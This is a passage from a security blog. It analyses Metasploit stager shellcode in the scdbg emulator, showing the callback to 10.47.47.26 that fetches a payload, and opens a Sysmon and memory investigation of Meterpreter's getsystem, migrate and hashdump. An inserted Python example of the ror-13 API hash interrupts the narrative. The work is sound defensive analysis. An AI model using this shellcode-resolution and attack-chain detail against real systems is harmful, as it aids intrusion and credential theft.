8</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><span style="font-family: courier;">Verbosity: 2</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401000 E882000000 call 0x401087 step: 0 foffset: 0</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span 
style="font-family: courier;">esp=12fe00 ebp=12fff0 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401087 5D pop ebp step: 1 foffset: 87</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdfc ebp=12fff0 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401088 686E657400 push dword 0x74656e step: 2 foffset: 88</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fe00 ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">40108d 6877696E69 push dword 0x696e6977 step: 3 foffset: 8d</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdfc ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401092 54 push esp step: 4 foffset: 92</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdf8 ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401093 684C772607 push dword 0x726774c step: 5 foffset: 93</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdf4 ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401098 FFD5 call ebp step: 6 foffset: 98</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdf0 ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401005 60 pusha step: 7 foffset: 5</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 
ebx=0</span><br /><span style="font-family: courier;">esp=12fdec ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401006 89E5 mov ebp,esp step: 8 foffset: 6</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdcc ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /><br /></font></font><div style="text-align: left;"><font face="courier" size="1">Stepcount 9</font></div><div></div></div><div><br /></div><div>Stepping up the verbosity again switches to an interactive mode where you're given the option to step through and select any of the options from this debug menu between instructions:</div><div><span style="font-family: courier; font-size: x-small;"><br /></span></div><div><div></div><span style="font-family: courier; font-size: x-small;">dbg></span><br /><span style="font-family: courier; font-size: x-small;"> ? - help, this help screen, h also works</span><br /><span style="font-family: courier; font-size: x-small;"> v - change verbosity (0-4)</span><br /><span style="font-family: courier; font-size: x-small;"> g - go - continue with v=0</span><br /><span style="font-family: courier; font-size: x-small;"> s - step, continues execution, ENTER also works</span><br /><span style="font-family: courier; font-size: x-small;"> c - reset step counter</span><br /><span style="font-family: courier; font-size: x-small;"> r - execute till return (v=0 recommended)</span><br /><span style="font-family: courier; font-size: x-small;"> u - unassembled x instructions at address (default eip)</span><br /><span style="font-family: courier; font-size: x-small;"> b - sets next free breakpoint (10 max)</span><br /><span style="font-family: courier; font-size: x-small;"> m - reset max step count (-1 = infinate)</span><br /><span style="font-family: courier; font-size: x-small;"> e - set eip (file offset or VA)</span><br /><span 
style="font-family: courier; font-size: x-small;"> w - dWord dump,(32bit ints) prompted for hex base addr and then size</span><br /><span style="font-family: courier; font-size: x-small;"> d - Dump Memory (hex dump) prompted for hex base addr and then size</span><br /><span style="font-family: courier; font-size: x-small;"> x - execute x steps (use with reset step count)</span><br /><span style="font-family: courier; font-size: x-small;"> t - set time delay (ms) for verbosity level 1/2</span><br /><span style="font-family: courier; font-size: x-small;"> k - show stack</span><br /><span style="font-family: courier; font-size: x-small;"> i - break at instruction (scans disasm for next string match)</span><br /><span style="font-family: courier; font-size: x-small;"> f - dereF registers (show any common api addresses in regs)</span><br /><span style="font-family: courier; font-size: x-small;"> j - show log of last 10 instructions executed</span><br /><span style="font-family: courier; font-size: x-small;"> o - step over</span><br /><span style="font-family: courier; font-size: x-small;"> ; - Set comment in IDA if .idasync active</span><br /><span style="font-family: courier; font-size: x-small;"> +/- - basic calculator to add or subtract 2 hex values</span><br /><span style="font-family: courier; font-size: x-small;"> .bl - list set breakpoints</span><br /><span style="font-family: courier; font-size: x-small;"> .bc - clear breakpoint</span><br /><span style="font-family: courier; font-size: x-small;"> .api - scan memory for api table</span><br /><span style="font-family: courier; font-size: x-small;"> .nop - nops out instruction at address (default eip)</span><br /><span style="font-family: courier; font-size: x-small;"> .seh - shows current value at fs[0]</span><br /><span style="font-family: courier; font-size: x-small;"> .segs - show values of segment registers</span><br /><span style="font-family: courier; font-size: x-small;"> .skip - skips current instruction 
and goes to next</span><br /><span style="font-family: courier; font-size: x-small;"> .reg - manually set register value</span><br /><span style="font-family: courier; font-size: x-small;"> .dllmap - show dll map</span><br /><span style="font-family: courier; font-size: x-small;"> .poke1 - write a single byte to memory</span><br /><span style="font-family: courier; font-size: x-small;"> .poke4 - write a 4 byte value to memory</span><br /><span style="font-family: courier; font-size: x-small;"> .lookup - get symbol for address</span><br /><span style="font-family: courier; font-size: x-small;"> .symbol - get address for symbol (special: peb,dllmap,fs0)</span><br /><span style="font-family: courier; font-size: x-small;"> .savemem - saves a memdump of specified range to file</span><br /><span style="font-family: courier; font-size: x-small;"> .idasync - connect IDASrvr plugin and sync view at step or break.</span><br /><span style="font-family: courier; font-size: x-small;"> .allocs - list memory allocations made</span><br /><div style="text-align: left;"><font face="courier" size="1"> q - quit</font></div><div></div></div><div><br /></div><div>There's also a <font face="courier">-r</font> option that will present a summary report at the end of the run. 
So the output becomes something like the following:</div><div><br /></div><div><div></div><span style="font-family: courier; font-size: small;">PS> scdbg.exe -r -s 2550000 -f shellcode.bin</span><br /><span style="font-family: courier; font-size: small;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier; font-size: small;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier; font-size: small;">Memory monitor enabled..</span><br /><span style="font-family: courier; font-size: small;">Initialization Complete..</span><br /><span style="font-family: courier; font-size: small;">Max Steps: 2550000</span><br /><span style="font-family: courier; font-size: small;">Using base offset: 0x401000</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier; font-size: small;">4010a8 InternetOpenA()</span><br /><span style="font-family: courier; font-size: small;">4010c4 InternetConnectA(server: 10.47.47.26, port: 80, )</span><br /><span style="font-family: courier; font-size: small;">4010d9 HttpOpenRequestA(path: /8Kh89, )</span><br /><span style="font-family: courier; font-size: small;">4010e9 HttpSendRequestA()</span><br /><span style="font-family: courier; font-size: small;">401117 VirtualAlloc(base=0 , sz=400000) = 600000</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">Stepcount 2550001</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">Analysis report:</span><br /><span style="font-family: courier; font-size: small;"> Reads of Dll memory detected (use -mdll for details)</span><br /><span style="font-family: courier; font-size: small;"> Uses peb.InMemoryOrder List</span><br /><font face="courier" size="2"><br /></font><span style="font-family: 
courier; font-size: small;">Signatures Found: None</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">Memory Monitor Log:</span><br /><span style="font-family: courier; font-size: small;"> *PEB (fs30) accessed at 0x40100a</span><br /><div style="text-align: left;"><font face="courier" size="2"> peb.InMemoryOrderModuleList accessed at 0x401011</font></div><div></div></div><div><br /></div><div>In the <font face="courier">Analysis report</font> output were some things I dug into further. <font face="courier">scdbg </font>reports "<font face="courier">Reads of Dll memory detected</font>" followed by a nudge to use <font face="courier">-mdll</font> for details. Let's try that:</div><div><span style="font-family: courier; font-size: x-small;"><br /></span></div><div><div><font face="courier" size="2"></font></div><font size="2"><span style="font-family: courier;">PS> scdbg.exe -r -s 444650 -mdll -f shellcode.bin -nc</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Memory monitor enabled..</span><br /><span style="font-family: courier;">Memory monitor for dlls enabled..</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 444650</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><font face="courier"><br /></font><span style="font-family: courier;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2f READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd30 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd31 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 
77c5cd32 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd33 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd34 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd35 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd27 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd28 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd29 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2a READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2b READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2c READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2d READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2e READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd20 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd21 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd22 READ</span><br /><font face="courier"><br /></font><span style="font-family: courier;">Stepcount 444651</span><br /><font face="courier"><br /></font><span style="font-family: courier;">Analysis report:</span><br /><span style="font-family: courier;"> Reads of Dll memory detected (use -mdll for details)</span><br /><span style="font-family: courier;"> Uses peb.InMemoryOrder List</span><br /><font face="courier"><br /></font><span style="font-family: courier;">Signatures Found: None</span><br /><font face="courier"><br /></font><span style="font-family: courier;">Memory Monitor Log:</span><br /><span style="font-family: courier;"> *PEB (fs30) accessed at 0x40100a</span><br /></font><div style="text-align: left;"><font face="courier" size="2"> 
peb.InMemoryOrderModuleList accessed at 0x401011</font></div></div><div><br /></div><div>Above we can see bytes being read from sequential memory addresses, one per <font face="courier">lodsb</font>. <font face="courier">scdbg </font>tells us the memory belongs to a dll, specifically msvcrt, the Microsoft Visual C Runtime library.</div><div><br /></div><div>In the <font face="courier">Analysis report</font> and <font face="courier">Memory Monitor Log</font> sections of the output, we also see mentions of the shellcode using the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb" target="_blank">PEB (Process Environment Block)</a>, specifically the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data" target="_blank"><font face="courier">InMemoryOrderModuleList</font></a>. I wasn't certain what this was about, but assumed it had something to do with the shellcode attempting to locate specific functions in some loaded module. This was confirmed by an old post from <a href="https://twitter.com/stephenfewer" target="_blank">Stephen Fewer</a> of <a href="https://web.archive.org/web/20171021140810/blog.harmonysecurity.com/2009_06_01_archive.html" target="_blank">Harmony Security back in June of 2009</a>. I'm grateful for <a href="http://archive.org" target="_blank">archive.org</a>. (Gratitude is great, but generosity is better. Donate to <a href="https://archive.org/donate/" target="_blank">archive.org</a>.)</div><div><br /></div><div>Given the info in Fewer's post, I wondered if I could run <font face="courier">scdbg</font> with the right arguments to see the code referencing the <font face="courier">InMemoryOrderModuleList</font>. Turns out, yes. 
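As an added example that is not from the post, from scdbg or from Fewer's code: the loop in the <font face="courier">-v</font> disassembly earlier (<font face="courier">lodsb</font>, uppercase anything at or above <font face="courier">'a'</font>, <font face="courier">ror edi,0xd</font>, add) is a name hash. The module name is read from the Ldr entry as UTF-16, terminator included, and uppercased; each export name is hashed the same way without uppercasing; and the sum of the two is compared against the constant the shellcode pushed before <font face="courier">call ebp</font>, <font face="courier">0x726774c</font>. The Python below reproduces that arithmetic and uses it the way an analyst does: to turn constants found in unknown shellcode back into API names, and to decode the two pushed dwords (<font face="courier">0x74656e</font>, <font face="courier">0x696e6977</font>) that spell the library name. The candidate list of (module, function) pairs is an assumption made here; a real table would be built from the export tables of the dlls you care about.

```python
# Added example (mine, not the post's, scdbg's or Metasploit's code): the
# ror-13 name hash seen in the -v disassembly, used to map hash constants in
# shellcode back to API names. The candidate (module, function) list below is
# an assumption for this example; build it from real export tables in practice.
from typing import Dict, Iterable, List, Optional, Tuple

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int = 13) -> int:
    """32-bit rotate right, the 'ror edi,0xd' in the disassembly."""
    value &= MASK32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def hash_bytes(data: bytes, uppercase: bool) -> int:
    """h = ror(h, 13) + byte over every byte, with 32-bit wraparound. The
    uppercase flag mirrors 'cmp al,0x61 / jl / sub al,0x20', applied to
    module names only."""
    h = 0
    for b in data:
        if uppercase and b >= 0x61:
            b -= 0x20
        h = (ror32(h) + b) & MASK32
    return h


def module_hash(name: str) -> int:
    # Ldr entries hold the base name as UTF-16; the byte count the loop uses
    # (BaseDllName's maximum length) takes in the two-byte terminator, so it
    # is hashed too.
    return hash_bytes(name.encode("utf-16-le") + b"\x00\x00", uppercase=True)


def function_hash(name: str) -> int:
    # Export names are ANSI; the loop runs until it has consumed the NUL.
    return hash_bytes(name.encode("ascii") + b"\x00", uppercase=False)


def api_hash(module: str, function: str) -> int:
    return (module_hash(module) + function_hash(function)) & MASK32


def build_table(candidates: Iterable[Tuple[str, str]]) -> Dict[int, Tuple[str, str]]:
    return {api_hash(m, f): (m, f) for m, f in candidates}


# Constructed candidate set: the APIs scdbg reported for this sample.
CANDIDATES = [
    ("kernel32.dll", "LoadLibraryA"), ("kernel32.dll", "VirtualAlloc"),
    ("wininet.dll", "InternetOpenA"), ("wininet.dll", "InternetConnectA"),
    ("wininet.dll", "HttpOpenRequestA"), ("wininet.dll", "HttpSendRequestA"),
    ("wininet.dll", "InternetReadFile"),
]
TABLE = build_table(CANDIDATES)


def resolve(constant: int) -> Optional[Tuple[str, str]]:
    """Map a constant pushed before 'call ebp' to (module, function), if known."""
    return TABLE.get(constant & MASK32)


def decode_pushed_string(dwords: List[int]) -> str:
    """'push 0x74656e' then 'push 0x696e6977' leaves the later push at the
    lower address, so the bytes read in reverse push order, little-endian."""
    raw = b"".join(d.to_bytes(4, "little") for d in reversed(dwords))
    return raw.split(b"\x00", 1)[0].decode("ascii")


if __name__ == "__main__":
    print(decode_pushed_string([0x74656E, 0x696E6977]), resolve(0x0726774C))
```

Two details matter for getting the same numbers the shellcode does: the terminators are part of both hashes, and the add wraps at 32 bits before the next rotate. Running a table built this way over every <font face="courier">push dword</font> that precedes a <font face="courier">call ebp</font> is a quick way to recover the import list of shellcode that never names its imports.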
The first one happens around step 10 and it happens six more times in the first 2.6 million steps:</div><div><span style="font-family: courier; font-size: x-small;"><br /></span></div><div><span style="font-family: courier; font-size: x-small;">PS> scdbg.exe -v -s 2550000 -f shellcode.bin | select-string 'fs:\[' -Context 2,2</span><br /><font face="courier" size="1"><br /></font><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="color: red; font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30] step: 10</span><br /><span style="color: red; font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="color: red; font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30] step: 178605</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp step: 718215</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span
style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp step: 1262515</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc] step: 1809940</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp step: 2357005</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp step: 2506045</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><div style="text-align: left;"><font face="courier" size="1"> 
401011 8B5214 mov edx,[edx+0x14]</font></div><div><font face="courier" size="1"></font></div></div><h3 style="text-align: left;">What have we learned?</h3><div>Probably the most important pieces of information were gleaned in the early goings. This <font face="courier">scdbg</font> command tells us the API calls made during the first 5+ million steps.</div><div><span style="font-family: courier; font-size: small;"><br /></span></div><div><div><font face="courier" size="2"></font></div><span style="font-family: courier; font-size: small;">PS> scdbg.exe -s 54465000 -api -f .\shellcode.bin -nc</span><br /><span style="font-family: courier; font-size: small;">Loaded 296 bytes from file .\shellcode.bin</span><br /><span style="font-family: courier; font-size: small;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier; font-size: small;">Initialization Complete..</span><br /><span style="font-family: courier; font-size: small;">Max Steps: 54465000</span><br /><span style="font-family: courier; font-size: small;">Using base offset: 0x401000</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier; font-size: small;">4010a8 InternetOpenA()</span><br /><span style="font-family: courier; font-size: small;">4010c4 InternetConnectA(server: 10.47.47.26, port: 80, )</span><br /><span style="font-family: courier; font-size: small;">4010d9 HttpOpenRequestA(path: /8Kh89, )</span><br /><span style="font-family: courier; font-size: small;">4010e9 HttpSendRequestA()</span><br /><span style="font-family: courier; font-size: small;">401117 VirtualAlloc(base=0 , sz=400000) = 600000</span><br /><div style="text-align: left;"><font face="courier" size="2">40112b InternetReadFile(4893, buf: 600000, size: 2000)</font></div><div style="text-align: left;"><font face="courier" size="2"><br /></font></div><div><font 
face="courier" size="2"></font></div></div><div>Combined with what we sorted out in the previous post, this paints a more complete picture. The calls above were made by the shellcode, so we can say the shellcode opened a network connection to 10.47.47.26 on port 80, which is consistent with what we saw in the Sysmon logs. The Sysmon logs didn't show us the request path, so this is a bit of new information: the request hit whatever resource was hosted at <font face="courier">/8Kh89</font>. Maybe that resource served up the payload that injected <font face="courier">metsrv.dll</font> and the other injected DLLs. We've learned more, but there are still some unanswered questions. Maybe we'll revisit those in a future post.</div><div><br /></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-1136237144994735342020-07-21T13:51:00.004-07:002020-07-27T11:43:16.459-07:00Meterpreter's Migrate: Detection and Investigation with memtriage and memdumppeIf you're fortunate enough to be running a modern endpoint detection and response (EDR) product or even endpoint protection (EPP), you may be in good shape for detecting or blocking things like <a href="https://github.com/rapid7/metasploit-framework/" target="_blank">Metasploit</a>'s <a href="https://github.com/rapid7/metasploit-payloads" target="_blank">Meterpreter payload</a>. Meterpreter's capabilities have been emulated by other frameworks and malware. 
While there are more sophisticated attack tools available, testing detections and investigating Meterpreter is still a valuable exercise.<div><br /></div><div>In this post, we'll take a look at a typical scenario involving a malicious Excel macro created using <a href="https://github.com/trustedsec/unicorn" target="_blank">TrustedSec's Unicorn</a> that spawns a Meterpreter reverse shell, which connects back to a listener on an endpoint running Metasploit. We'll review some of the data that <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" target="_blank">Sysmon</a> captures using a <a href="https://github.com/SwiftOnSecurity/sysmon-config" target="_blank">popular Sysmon configuration</a> from Internet infosec celeb <a href="https://twitter.com/SwiftOnSecurity" target="_blank">SwiftOnSecurity</a>.</div><div><br /></div><div>After seeing what Sysmon captures, we'll grab <a href="https://twitter.com/gleeda" target="_blank">gleeda's</a> <a href="https://github.com/gleeda/memtriage" target="_blank">memtriage</a> to take a deeper look. If you're not familiar with memtriage, you really should check it out, as it enables investigators to run more than two dozen <a href="https://github.com/volatilityfoundation/volatility" target="_blank">Volatility</a> plugins against an endpoint while it is up and running. Years ago I was working in an environment with hundreds of thousands of servers strewn across data centers worldwide, often with 192GB of RAM. Imagine trying to take a memory dump from one of those systems to run an investigation to ground. Having something like memtriage would have made investigations easier.</div><h2 style="text-align: left;">Let's play: Sysmon Says</h2><div>Our unsuspecting user has opened an Excel spreadsheet containing a malicious macro as outlined above. 
Unbeknownst to the user, this has caused a reverse shell to call back to a listener on a remote system, where the attacker used Meterpreter's <a href="https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/post/meterpreter/extensions/priv/priv.rb" target="_blank">priv extension</a> to call <font face="courier">getsystem</font>, elevating the attacker's privileges to SYSTEM on the victim machine. That in turn enables the attacker to <a href="https://github.com/rapid7/metasploit-framework/blob/5e65021914e28bbc929fdc010143d012688f75ca/modules/post/windows/manage/migrate.rb" target="_blank"><font face="courier">migrate</font></a> their malicious agent into a legitimate process on the machine -- <font face="courier">spoolsv.exe</font> -- using <a href="https://github.com/rapid7/metasploit-framework/tree/76954957c740525cff2db5a60bcf936b4ee06c42/external/source/shellcode/windows/x64/src/migrate" target="_blank">code that's been around for at least a decade</a>. Following the migration to <font face="courier">spoolsv.exe</font>, the attacker ran <a href="https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb" target="_blank">hashdump</a>.</div><div><br /></div><div>Here's some of what Sysmon logged:</div><div><br /></div><div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Log Name:<span class="Apple-converted-space"> </span>Microsoft-Windows-Sysmon/Operational</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 
0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Source:<span class="Apple-converted-space"> </span>Microsoft-Windows-Sysmon</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:07 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Event ID:<span class="Apple-converted-space"> </span>1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: Process Create (rule: ProcessCreate)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: 
<span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:07.410</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a6fb-5f14-437f-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2476</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 